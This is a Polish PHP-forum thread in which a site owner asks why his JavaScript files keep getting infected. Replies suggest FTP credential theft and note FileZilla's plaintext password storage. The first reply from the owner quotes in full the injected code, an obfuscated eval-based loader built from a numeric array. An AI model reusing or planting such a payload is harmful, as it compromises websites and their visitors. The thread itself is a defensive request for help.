Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [JavaScript]Infekowanie plików js
Forum PHP.pl > Forum > Przedszkole
cinus_pl
11.09.2012, 17:20:01
Witam,
mam problem ze szkodliwymi botami odwiedzającymi moją stronę. Infekują one pliki js, z których korzysta mój index. Próbowałem zablokować dostęp do strony przez .htaccess, jednak za każdym razem przychodzi do mnie inny bot. Na serwerze nie zostały utworzone żadne obce pliki. W jaki sposób naprawić problem?
lukaskolista
11.09.2012, 17:27:22
Co znaczy "infekowanie plikow js"?
cinus_pl
11.09.2012, 17:35:07
Na końcu skryptów dodawany jest ten kod

CODE
try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,
84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,1
9,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,1
8,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,
93,98,18,30,19,102,89,92,101,31,69,18,27,19,90,90,46,-1,-5,19,18,17,19,91,87,27,102,86,102,102,17,49,18,33,28,109,-2,-3,18,17,19,18,17,19,18,17,103,90,90,102,32,100,88,87,85,19,47,17,103,87,100,103,
45,-2,-3,18,17,19,18,110,19,87,93,102,87,17,110,-1,-5,19,18,17,19,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,101,88,101,101,
19,29,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,111,-2,-3,18,17,19,18,99,88,102,102,101,96,17,27,102,89,92,101,31,102,87,86,87,18,27,19,
102,89,92,101,31,98,96,86,66,104,86,101,63,26,46,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,67,84,96,85,98,95,63,104,95,83,88,100,56,88,96,86
,101,83,101,98,100,25,104,96,90,107,27,108,0,-4,17,19,18,17,105,83,99,19,86,17,48,18,95,88,105,17,55,83,101,88,26,102,97,91,10
5,29,35,33,35,34,26,46,-1,-5,19,18,17,19,104,82,101,18,100,19,47,17,64,83,101,91,32,84,88,91,93,27,86,31,90
,87,101,59,97,102,101,101,25,28,33,36,28,45,-2,-3,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,35,38,38,38,41,41,41,44,34,
34,19,29,17,27,86,31,90,87,101,64,97,95,103,90,25,28,18,27,19,34,105,57,56,55,57,
56,55,28,18,28,19,26,85,33,89,86,103,54,82,103,87,25,28,18,27,19,34,105,57,56,55,
57,27,28,19,26,62,84,102,89,33,100,96,104,96,85,27,101,17,29,18,33,107,56,55,57,2
7,26,46,-1,-5,19,18,17,19,102,89,92,101,31,52,18,46,19,38,41,37,41,34,46,-1,-5,19,18,17,19,102,89,92,101,31,64,18,46,19,36,34,39,41,37,43,37,39,39,41,44,0,-4,17,19,18,17,103,90,90,102,32,66,19,47,17,103,90,90,102,32,62,19,33,17,103,90,9
0,102,32,50,46,-1,-5,19,18,17,19,102,89,92,101,31,69,18,46,19,102,89,92,101,31,64,18,22,19,102,89,9
2,101,31,52,45,-2,-3,18,17,19,18,101,91,91,100,33,97,95,88,65,103,88,100,62,19,47,17,36,32,33,19,33
,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,102,89,92,101,31,97,87,105,103,18,46,19,96,86,107,102,67,84,96,85,
98,95,63,104,95,83,88,100,44,0,-4,17,19,18,17,101,87,101,104,100,95,19,102,89,92,101,44,0,-4,110,0,-4,-2,-3,88,102,97,85,101,92,97,95,19,85,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84
,86,101,26,99,31,18,62,92,96,29,19,63,82,107,27,108,0,-4,17,19,18,17,101,87,101,104,100,95,19,63,82,103,90,31,101,97,102,97,86,25,27,63
,82,107,31,62,92,96,26,19,28,17,101,32,95,88,106,101,27,27,17,30,18,62,92,96,26,4
6,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,88,88,96,86,101,83,101,88,66,100,88,103,85,98,68,
82,97,86,96,96,69,101,101,91,95,90,26,102,97,91,105,31,18,93,88,96,88,103,90,29,1
9,108,96,97,87,26,110,-1,-5,19,18,17,19,104,82,101,18,99,84,96,85,19,47,17,97,87,104,19,68,82,97,86,96,96,
64,102,96,84,86,101,57,86,97,87,99,84,102,96,101,26,102,97,91,105,28,45,-2,-3,18,17,19,18,103,84,100,17,95,87,101,103,87,99,102,18,46,19,20,98,96,83,89,90,1
05,84,103,97,97,89,92,90,95,100,87,99,92,99,89,85,104,90,87,104,91,87,90,109,105,
85,106,20,31,102,98,93,92,102,25,26,25,26,46,-1,-5,19,18,17,19,104,82,101,18,100,103,100,17,48,18,24,26,45,-2,-3,-5,87,98,100,25,105,83,99,19,91,17,48,18,33,46,18,90,19,46,17,95,87,95,90,102,89,
46,18,90,19,29,28,19,27,108,0,-4,17,19,18,17,19,18,17,19,101,101,101,18,28,48,18,93,88,102,101,88,100,100,78,85
,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84,86,101,26,99,84,96,85,31,18,33,31
,18,93,88,102,101,88,100,100,33,94,86,97,89,101,91,18,30,19,35,26,80,45,-2,-3,18,17,19,18,110,0,-4,17,19,18,17,101,87,101,104,100,95,19,101,101,101,18,28,19,25,31,26,18,28,19,10
8,96,97,87,44,0,-4,110,0,-4,-2,-3,101,86,103,59,95,103,87,99,105,83,93,27,88,102,97,85,101,92,97,95,27,27,108,0,-4,17,19,18,17,103,100,106,110,-1,-5,19,18,17,19,18,17,19,18,90,89,26,101,108,98,86,98,88,17,92,88,99,84,95,86,74,8
3,100,54,100,86,84,102,86,87,18,46,48,18,19,104,96,85,88,88,90,97,87,85,21,27,108
,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,104,96,90,107,18,46,19,63,82
,103,90,31,101,97,102,97,86,25,30,96,86,106,18,53,84,102,86,27,27,32,36,34,33,35,
27,44,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,87,97,94,84,91,95,65,83,94,8
8,18,46,19,89,86,97,87,99,84,102,86,67,101,86,104,86,96,69,83,95,87,97,94,70,102,
99,92,96,88,27,103,95,92,106,29,19,35,39,31,18,24,92,96,87,98,25,26,46,-1,-5,19,18,17,19,18,17,19,18,17,19,18,17,92,88,99,96,18,46,19,86,96,86,103,94,88,96
,101,33,85,99,88,83,101,88,55,93,88,95,86,97,102,25,21,59,55,69,51,62,56,20,26,46
,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,87,101,52,102,101,101,
91,83,104,102,86,27,20,100,101,85,19,31,18,19,91,102,101,99,44,32,34,20,28,87,97,
94,84,91,95,65,83,94,88,29,19,34,91,95,33,85,88,92,49,34,39,20,26,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,106,9
1,85,103,90,17,48,18,19,35,98,105,21,45,17,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,90,89,100,94,33,101,101,108,94,86,33,90,86
,92,89,89,103,18,46,19,20,33,99,106,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,105,9
1,100,92,84,90,95,91,101,108,18,46,19,20,89,92,86,85,88,96,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,86,96,86,103,94,88,96,101,33,84,96,87,107,
31,84,98,97,88,96,85,54,90,90,95,86,25,92,88,99,96,27,44,0,-4,-6,-4,-5,90,89,100,82,96,87,72,84,101,52,101,87,82,103,87,85,19,47,17,103,100,102,88,45
,-2,-3,18,17,19,18,17,19,18,17,112,-1,-5,19,18,17,19,111,84,84,102,84,91,26,86,28,109,90,89,100,82,96,87,72,84,101,52,1
01,87,82,103,87,85,19,47,17,104,96,85,88,88,90,97,87,85,46,111,-2,-3,111,29,19,35,33,35,27,44];}w=f;s=[];r=String;x="j%";for(i=0;-i+1773!=0;i+=1){j=i;if(e)s=s+r.fromCharCode((1*w[j]+e(x+3)+13));}
try{asgasg&13}catch(asga){e("if(1)"+s);}

kamil4u
11.09.2012, 17:45:20
Zmień hasło do FTP i samego klienta FTP
cinus_pl
11.09.2012, 17:52:22
Korzystałem z FilleZilla'i, nie zapamiętywałem nigdzie hasła, sam komputer po skanach wydaje się czysty. Jak hasło mogło wycieknąć i z jakiego klienta najlepiej korzystać? i jeszcze jedno pytanie, czy jeżeli moje hasło nie zostało w żaden sposów wykradzione to roboty są w stanie modyfikować zawartość mojego serwera?
kamil4u
11.09.2012, 18:50:34
Jeżeli nie mają dostępu do konta FTP nie mogą modyfikować kodu. Zakładając, że bardzo nie zmieniałeś ustawień na serwerze( na tym się nie znam ). Gdy nikt poza Tobą nie zna hasła i masz standardowe ustawienia, nikt nie może zmienić Ci kodu. Aha. W sumie mogą jak masz dziurawą aplikację PHP, ale w tym przypadku to mało prawdopodobne - ale zbadaj to też.

Co do klienta. Klika lat temu były znane przypadki zapamiętania haseł w total-commande-rze. Jeżeli miało się zapisane hasło to właśnie automaty( gdy komp był zainfekowany ) doklejały różne śmieci do plików.

Zmień hasło, sprawdź czy nie masz rażących dziur w skrypcie PHP i poczekaj czy sytuacja się powtórzy. Zmień na wszelki wypadek klienta i nie zapisuj nigdzie na kompie tego hasła. Jeżeli sytuacja się powtórzy do ja nie wiem jak masz sobie z tym poradzić.
toffiak
11.09.2012, 19:33:22
Domyślnie filezilla zapamiętuje i przechowuje twoje dane jak zwykły tekst, aby zabezpieczyć się przed zapamiętywanie koniecznie należy zmodyfikować plik konfiguracyjny, szczegóły tutaj
cinus_pl
11.09.2012, 20:12:27
dziękuję za wszystkie porady, mam nadzieję, że sytuacja już się nie powtórzy.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.